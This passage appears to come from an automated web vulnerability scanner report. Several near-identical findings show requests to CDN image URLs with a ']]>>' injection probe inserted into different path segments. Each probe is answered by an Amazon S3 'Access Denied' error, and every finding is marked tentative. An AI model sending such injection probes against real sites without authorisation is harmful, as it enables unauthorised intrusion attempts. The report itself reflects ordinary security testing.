x-amz-id-2: ew1FVhf5XdT2B7mzmqYc9MhJd9pRDspGpiUMZQEaqKzJzpFlH0RqdqsSHUdvei/A
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:14 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 7487ccfcc824e6b736c561cee7c9b7e235e32afe888c3a5f5d0a52cc1465d23cf0022bd7e5fb1f83
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F6DB41A8EFBD2BAA</RequestId><HostId>ew1FVhf5XdT2B7mzmqYc9MhJd9pRDspGpiUMZQEaqKzJzpFlH0
...[SNIP]...

8.146. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff6633-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 22D3974817464B94
x-amz-id-2: MuXQRZEZuN2tNPYsSwU/A4FyGXaxsfNSJOjRKTEvn4XnhaE734E7Yitze4oNXGlJ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:03 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ed72bf77c824a9fc4e68791c95d50821b2aeeb12af99f6f046d8ceb9fe4b0dc7c34551436e2b1385
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>22D3974817464B94</RequestId><HostId>MuXQRZEZuN2tNPYsSwU/A4FyGXaxsfNSJOjRKTEvn4XnhaE734
...[SNIP]...

8.147. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff6633-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: CFD4206E8E4DD43C
x-amz-id-2: b/FHp0t9zQldso7ZWtV61scVGNtN9ksp4WW2QBSW5b6NeLUdgYSwvw5bfXeQZ7jv
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:04 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: db08299a5dc1b2b2ff87de9bf3db18f6848a0964cc466ac2fcf299651385bae9ca3372015aa7bd49
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>CFD4206E8E4DD43C</RequestId><HostId>b/FHp0t9zQldso7ZWtV61scVGNtN9ksp4WW2QBSW5b6NeLUdgY
...[SNIP]...

8.148. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff6633-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4BBB83BE883B3E40
x-amz-id-2: Uy0Cy08+SY9BvOZp2+nW1uGmjKvchFW2ve1gAmib68nYWqORAGVMUKIWU5rG9Nd+
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:09 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: a23a4fd666dc3ffb54ec1391159ee3f65626a7963e75ccd14a58d1d8f14505c7ba588521fb4d5ee4
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4BBB83BE883B3E40</RequestId><HostId>Uy0Cy08+SY9BvOZp2+nW1uGmjKvchFW2ve1gAmib68nYWqORAG
...[SNIP]...

8.149. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 77C1298B25B1D238
x-amz-id-2: CwAAl2b+pAEiOavz/gJQHBHEBkzWzCCe0fJKLvRX9b4Bo79Q8HY326MnY77hMj/i
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:11 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ffaca7834ca7c8dc2906c3c7270bf73256ee51d7a4ea765b7e67bc1c2b8980b66249a28736f8d4d3
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>77C1298B25B1D238</RequestId><HostId>CwAAl2b+pAEiOavz/gJQHBHEBkzWzCCe0fJKLvRX9b4Bo79Q8H
...[SNIP]...

8.150. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff6633-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 3D91D14FC866CCA4
x-amz-id-2: OEHikW4GL6N8QsWAxmvli47Ljpmh5c1LjadYJom9JZvOyD/7tUuAABfjxU3D8AQx
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: a471e5a07b4231172ee4cc3191cb48a497b925369dc1946a56bab09e33f9ceda0502d882592f1765
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3D91D14FC866CCA4</RequestId><HostId>OEHikW4GL6N8QsWAxmvli47Ljpmh5c1LjadYJom9JZvOyD/7tU
...[SNIP]...

8.151. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff6633-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 17AE0B9B09C750DD
x-amz-id-2: XJV/JWFk+jtQdl9w+k0oL5UksLe5FYLxPiMCzih/YDXqDIAt/ubJzb85VsHloT+t
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:52 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 018cecdc8bc42a9e5b011004028014cd0258ce09e62bb56cf6a2e2a0c80e3af8f7e7f86ddb34c899
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>17AE0B9B09C750DD</RequestId><HostId>XJV/JWFk+jtQdl9w+k0oL5UksLe5FYLxPiMCzih/YDXqDIAt/u
...[SNIP]...

8.152. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff6633-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 35102CA8C8EDB502
x-amz-id-2: pVMv7gZRZ0/Wm4CAvPqg4fB4Mr1AyZwKmEYoN9RbuDFtdnA0WQt1I1kC68zurDhi
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:55 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 2b1673324f297eb25e1120621e2ec2a54fb7e2704ee6cb7688b7e33b296069579f58c83366ada742
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>35102CA8C8EDB502</RequestId><HostId>pVMv7gZRZ0/Wm4CAvPqg4fB4Mr1AyZwKmEYoN9RbuDFtdnA0WQ
...[SNIP]...

8.153. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D897AE5604A6D968
x-amz-id-2: S3gThptg8QIhd9AqXGYW8nncinIgMedys7Nx0hz/W7BkTF+gBv3VV2rihN8V+Qgp
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:57 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 03d1aa36ce75b478e1a7282d5c45f91cdb6f86c4b2cff99ef3867b00973ef2a11dcd625b1870a4bf
Via: 1.0 d5ba42a2d3d506b64c73b6035a0a9f60.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D897AE5604A6D968</RequestId><HostId>S3gThptg8QIhd9AqXGYW8nncinIgMedys7Nx0hz/W7BkTF+gBv
...[SNIP]...

8.154. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff6633-ff6633-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 2EC993ACC696A1D7
x-amz-id-2: H93NZFEbC6HdNR8UFlRrnU96JSf5HBUK0WO6vIgKkfHMGpmAtY1uhSTAgk0bzMpi
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 844510d172ecc0207ea710acc638e3647da0a80567425a3e31e7b8c7c9e3964f4add950307b9a0f2
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>2EC993ACC696A1D7</RequestId><HostId>H93NZFEbC6HdNR8UFlRrnU96JSf5HBUK0WO6vIgKkfHMGpmAtY
...[SNIP]...

8.155. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff6633-ff6633-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 472A15C34A39FB0B
x-amz-id-2: OlslQgvWjKFBRq9BdvHd56HJzySyZGWWaZstrTIHEXeVZ5EAhBoASCnRD0EnLkUA
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:52 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 9c8ba9be772642463299b891d389dbdb35622ec2cd6a926ce2bf57d32e11da353668bc351a945d44
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>472A15C34A39FB0B</RequestId><HostId>OlslQgvWjKFBRq9BdvHd56HJzySyZGWWaZstrTIHEXeVZ5EAhB
...[SNIP]...

8.156. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff6633-ff6633-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 0881DECEFF89E695
x-amz-id-2: t0qNXRQpY2La5d9yFs4+dI5ZXzRYgtgfpHd0ZW1sPH2fXEUOGUSGHioaklfAFMGl
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:55 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 655afc9c6a5bd3fa331f71c35dbee3d08237b51cb9048725f4ee2803f3431a02c63f6fe56d92dc37
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0881DECEFF89E695</RequestId><HostId>t0qNXRQpY2La5d9yFs4+dI5ZXzRYgtgfpHd0ZW1sPH2fXEUOGU
...[SNIP]...

8.157. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 18B4685D33F69724
x-amz-id-2: 0GZh9uS1h3f+px7ikq0UVvyEPYkiXWbTYLTIxdRBysZfWjqI0+j0Imh6FDhYrMg8
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:58 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: d105d6cd4410cbca94ddd56cee181c5ae2c11278e77a0c70ea2e093b89ebb24ee901d4f22573cb5f
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>18B4685D33F69724</RequestId><HostId>0GZh9uS1h3f+px7ikq0UVvyEPYkiXWbTYLTIxdRBysZfWjqI0+
...[SNIP]...

8.158. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff9933-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D797BF4792112964
x-amz-id-2: QFwxlGGMGJlNabHBpkAvHYQy5z9kHC//cuuZyzGGlb+T4seF6bmLVQgOcJMI2SxK
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:06 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 8faa1d0e4730daae81b378f73bf1da67f82bc666c3b810aadb6457fe146ec0582ee6ef6d33f115a7
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D797BF4792112964</RequestId><HostId>QFwxlGGMGJlNabHBpkAvHYQy5z9kHC//cuuZyzGGlb+T4seF6b
...[SNIP]...

8.159. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff9933-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 54351A929372EBFD
x-amz-id-2: 3bA+fOGAgkCGGNuKDs6raSs5DQTk5PoRfTuddtAcr95Sy7XAGxFFwC45yCsBi1yD
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:15 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: b32b414bda2e429016f4fafaed52e8d00bd140a5989d763439bf6eaed29077c2e947dbbb45bc0eed
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>54351A929372EBFD</RequestId><HostId>3bA+fOGAgkCGGNuKDs6raSs5DQTk5PoRfTuddtAcr95Sy7XAGx
...[SNIP]...

